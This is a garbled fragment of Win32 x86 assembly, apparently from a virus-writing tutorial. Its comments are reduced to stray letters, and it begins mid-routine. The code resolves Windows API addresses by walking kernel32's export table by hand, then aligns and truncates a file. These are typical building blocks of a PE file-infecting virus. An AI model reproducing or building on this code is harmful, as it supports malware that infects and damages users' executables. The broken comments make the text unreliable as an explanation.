Win32


- 14


xchg edi,esi

xor al,al @@2: scasb jnz @@2

xchg edi,esi

@@3: cmp byte ptr [esi],0BBh jnz @@1

ret GetAPIs endp

GetAPI proc mov edx,esi mov edi,esi

xor al,al @_1: scasb jnz @_1

sub edi,esi ; EDI = pp mov ecx,edi

xor eax,eax mov esi,3Ch add esi,[ebp+kernel] lodsw add eax,[ebp+kernel]

mov esi,[eax+78h] add esi,1Ch

add esi,[ebp+kernel]

lea edi,[ebp+AddressTableVA]

lodsd add eax,[ebp+kernel] stosd

lodsd add eax,[ebp+kernel] push eax ; mov [NameTableVA],eax =) stosd

lodsd add eax,[ebp+kernel] stosd

pop esi

xor ebx,ebx

@_3: lodsd push esi add eax,[ebp+kernel] mov esi,eax mov edi,edx push ecx cld rep cmpsb pop ecx jz @_4 pop esi inc ebx jmp @_3

@_4: pop esi xchg eax,ebx shl eax,1 add eax,dword ptr [ebp+OrdinalTableVA] xor esi,esi xchg eax,esi lodsw shl eax,2 add eax,dword ptr [ebp+AddressTableVA] mov esi,eax lodsd add eax,[ebp+kernel] ret GetAPI endp

;-------------------------------------; ; p p, p p ; ; p, p, ; ; p p ;). ; ;-------------------------------------;

; input: ; EAX - , p p ; ECX - p p ; output: ; EAX - p

Align proc push edx xor edx,edx push eax div ecx pop eax sub ecx,edx add eax,ecx pop edx ret Align endp

;-------------------------------------; ; pp p PE: p ; ; p p. H, , ; ; p. ; ;-------------------------------------;

; input: ; ECX - p ; output: ; H

TruncFile proc xor eax,eax push eax push eax push ecx push dword ptr [ebp+FileHandle] call [ebp+_SetFilePointer]

push dword ptr [ebp+FileHandle] call [ebp+_SetEndOfFile] ret TruncFile endp